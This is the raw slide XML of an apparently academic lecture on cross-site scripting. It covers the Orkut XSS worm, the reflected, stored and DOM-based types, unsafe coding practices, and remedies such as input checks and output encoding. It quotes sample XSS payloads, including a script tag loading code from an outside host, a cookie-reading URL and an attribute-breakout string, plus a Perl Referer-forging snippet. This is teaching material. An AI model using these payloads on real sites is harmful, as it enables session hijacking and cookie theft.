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85" r:id="rId2"/>
    <p:sldId id="320" r:id="rId3"/>
    <p:sldId id="322" r:id="rId4"/>
    <p:sldId id="321" r:id="rId5"/>
    <p:sldId id="319" r:id="rId6"/>
    <p:sldId id="323" r:id="rId7"/>
    <p:sldId id="325" r:id="rId8"/>
    <p:sldId id="328" r:id="rId9"/>
    <p:sldId id="329" r:id="rId10"/>
    <p:sldId id="327" r:id="rId11"/>
    <p:sldId id="383" r:id="rId12"/>
    <p:sldId id="344" r:id="rId13"/>
    <p:sldId id="346" r:id="rId14"/>
    <p:sldId id="345" r:id="rId15"/>
    <p:sldId id="343" r:id="rId16"/>
    <p:sldId id="367" r:id="rId17"/>
    <p:sldId id="369" r:id="rId18"/>
    <p:sldId id="331" r:id="rId19"/>
    <p:sldId id="330" r:id="rId20"/>
    <p:sldId id="347" r:id="rId21"/>
    <p:sldId id="354" r:id="rId22"/>
    <p:sldId id="355" r:id="rId23"/>
    <p:sldId id="356" r:id="rId24"/>
    <p:sldId id="352" r:id="rId25"/>
    <p:sldId id="3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113" d="100"/>
          <a:sy n="113" d="100"/>
        </p:scale>
        <p:origin x="15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http://www.owasp.org/index.php/DOM_Based_XSS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2DDE3F-9CB7-4280-B589-2F9F94FB7D7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680-D936-4409-9718-048DD23DB69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F69-63E6-4459-83D4-14F152031FE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741B9EB9-ED73-41D1-B448-846D600C4E12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C8D-04EF-47CA-947B-5200BBA7452B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97E-B383-4AE3-9AF0-B8EABD50A750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31E-6CDF-400D-8FF7-DA3363E6A38F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3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25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B40BE8-A70F-464B-890C-5DBBA7D7193D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9" r:id="rId5"/>
    <p:sldLayoutId id="2147483672" r:id="rId6"/>
    <p:sldLayoutId id="2147483674" r:id="rId7"/>
    <p:sldLayoutId id="2147483675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 Vulnerabilities 3: XSS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59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XSS?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XSS work against machines behind firewall?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yes! only needs a vulnerable but trusted server  inside. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can SSL/TLS Mitigate XSS?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No! Think why?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not necessarily using &lt;script&gt; block:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are also part of code.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in Orkut</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491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5208" y="1371600"/>
            <a:ext cx="75438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Orkut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Google’s social network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>37 million members (2006), very popular in Brazil</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bug allowed users to insert scripts in their profiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Orkut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cookie Exploit: user views infected profile, all groups he owns are transferred to attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>virus.js: attack script in a flash file </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every viewer of infected profile is joined to a community</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Infectatos pelo Virus do Orkut” (655,000 members at peak!)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Virus adds malicious flash as a “scrap” to the visitor’s profile; everybody who views that profile is infected, too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exponential propagation!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733800" y="1143000"/>
            <a:ext cx="50927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http://antrix.net/journal/techtalk/orkut_xss.html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6565900" y="1695450"/>
            <a:ext cx="2425700" cy="2857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 dirty="0"/>
              <a:t>Example of XSS exploit code</a:t>
            </a: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 flipH="1" flipV="1">
            <a:off x="5867400" y="1528763"/>
            <a:ext cx="698500" cy="166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Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="6287768"/>
            <a:ext cx="3810000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b="1" dirty="0"/>
              <a:t>Similar to “wall post” in Facebook</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60425" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5181600" y="5811518"/>
            <a:ext cx="46038" cy="476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Attack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b="1" dirty="0"/>
              <a:t>Non-persistent (Reflective):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attack script is reflected back to the victim user as part of a page from the vulnerable website.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>Persistent (Stored): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker makes a webpage/database on the vulnerable website and stores the malicious code permanently there.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>DOM-based: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script.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Non-persistent (Reflective)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Most simplistic and dangerous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Attack script is reflected back to the victim user as part of a page from the vulnerable website. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The website responds to the web client input data without checking it properly.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Input examples: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&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;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&lt;IMG SRC="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('XSS');"&gt;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&lt;IMG SRC=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('XSS')&gt;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&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;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 (Stored)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attacker makes a webpage/database on the vulnerable website and stores the malicious code permanently there:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mallory posts a message with malicious payload to a social network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When Bob reads the message, Mallory's XSS steals Bob's cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mallory can now hijack Bob's session and impersonate Bob.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If site outputs data from cookies, the attacker infects the cookie such that each time the victim goes back to that site:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the script in the cookie is displayed,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the malicious code runs,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and the attack is persistent until the user removes the cookie.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777088" y="4495800"/>
            <a:ext cx="7543800" cy="152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browser creates a DOM object for the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> object contains the script!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>This will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>echoed into the page (DOM) and rendered at runtime.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284912"/>
            <a:ext cx="81534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…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Select your language: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&lt;select&gt;&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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("&lt;OPTION value=1&gt;“ +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document.location.href.substring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document.location.href.indexOf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("default=")+8)+"&lt;/OPTION&gt;");</a:t>
            </a:r>
          </a:p>
          <a:p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("&lt;OPTION value=2&gt;English&lt;/OPTION&gt;");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&lt;/script&gt;&lt;/select&gt;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…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Bodoni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page.html?default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=&lt;script&gt;alert(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document.cookie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)&lt;/script&gt;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267201" y="1937266"/>
            <a:ext cx="2819399" cy="165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86600" y="1752600"/>
            <a:ext cx="215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Vulnerable HTML!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3810001" y="3538435"/>
            <a:ext cx="2819398" cy="165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29399" y="3353769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Malicious URL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Not-to-Do’s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2819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Using “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>()” in a server-side code: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vulnerable  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript function. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passes code to the browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="640080" lvl="2" indent="0">
              <a:buNone/>
            </a:pP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eval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("a=42; b=69;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a+b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);"");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Trusting an HTTP request, e.g., header referrer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shouldn’t rely to authenticate the referring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05" y="4038600"/>
            <a:ext cx="787879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use HTTP::Request::Common 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qw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(POST GET); </a:t>
            </a:r>
          </a:p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use LWP::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UserAgent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ua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 = LWP::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UserAgent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-&gt;new(); $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req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 = POST ’http://www.northwindtraders.com/dologin.asp’,          </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT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	[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Uername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 =&gt; ’mike’,   Password =&gt; ’mypa$w0rd’,  ];</a:t>
            </a:r>
          </a:p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req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-&gt;header(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Referer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 =&gt; ’http://www.northwindtraders.com/login.html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’); $res = $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ua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-&gt;request($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req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Not-to-Do’s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Putting sensitive data in cookies and fields:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can change easily them to get more advantage from the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Using Predictable cookies:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are to make HTTP connections </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stateful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Predictable cookies let the attacker hijack a user HTTP connection to a web server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note: SSL does not help here because the cookie can be set to be a valid, predictable cookie belonging to another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XSS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Provide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Allowing / Relying on “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” HTML constructs;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., No &lt;Script&gt;, but allowing  &lt;IMG&gt; and &lt;TABLE&gt; tags.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Threats still exist like &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>([code])&gt;. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>See the textbook for more examples.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0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Making specific scripts inert:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., converting all input to uppercase to thwart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> JavaScript attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>What if the attacker uses a non-case-sensitive script like VBScript?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Site Scripting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(XSS)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769192" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remedy 1: Check Input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of looking for insecure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>constructs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, check for dangerous HTML/script in the input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not let HTML / script in inputs from untrusted users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>regular expressions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that let you check for allowed tags/characters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g.,  (explore how it works)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if ( / ^ ( ?:[\s\w\?\!\,\.\’\"]* | (?:\&lt;\/?(?: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i|b|p|br|em|pre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)\&gt;) )* $/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 ){….}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769192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Remedy 2: Encode Output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encoding the data before displaying it; e.g., the dangerous symbol ‘&lt;’ becomes harmless ‘&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ -&gt; less than</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remedy 3: Add “double quotes” around tag properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>E.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,: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&lt;a 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=http://www.contoso.com/detail.asp?id=&lt;%=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request.querystring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("id") %&gt;&gt;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&lt;a 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=http://www.contoso.com/detail.asp?id=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[INPUT]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  <a:p>
            <a:pPr marL="320040" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malicious input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2105&gt;&lt;script event=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploitcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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Put quotes like “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ….”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 script will be read as data.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Note: HTML encoding doesn’t escape single quote characters, but it does escape double quotes.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769192" cy="46482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Remedy 4: Insert data in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>innerText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> property</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Makes arbitrary content / script inert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not recommended when populating a page with untrusted input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remedy 5: Force the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>codepage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>different representations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of the character set to avoid accepting unpredicted inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., 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&lt;meta http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Bodoni MT" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>equiv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="Content-Type" content="text/html; charset=iso-8859-1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains all characters necessary to type Western European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769192" cy="46482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Remedy 6: Add HTTP-only Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used in IE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie cannot be accessed by D-HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Remedy 7: Mark Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different security zones: web, computer, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use frame isolation policies:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>same-origin policy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 for XSS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Write down all the entry points to your web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember that this includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>fields informs, query strings,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP headers, cookies, and data-from databases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Trace each datum as it flows through the application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 for XSS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US" dirty="0"/>
              <a:t>Determine whether the datum is ever reflected to output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Review error message pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Review “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” or “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>” used in the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If it is reflected to output, is it clean and sanitized?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use regular expressions to verify this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If verified but still suspicious, use output coding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
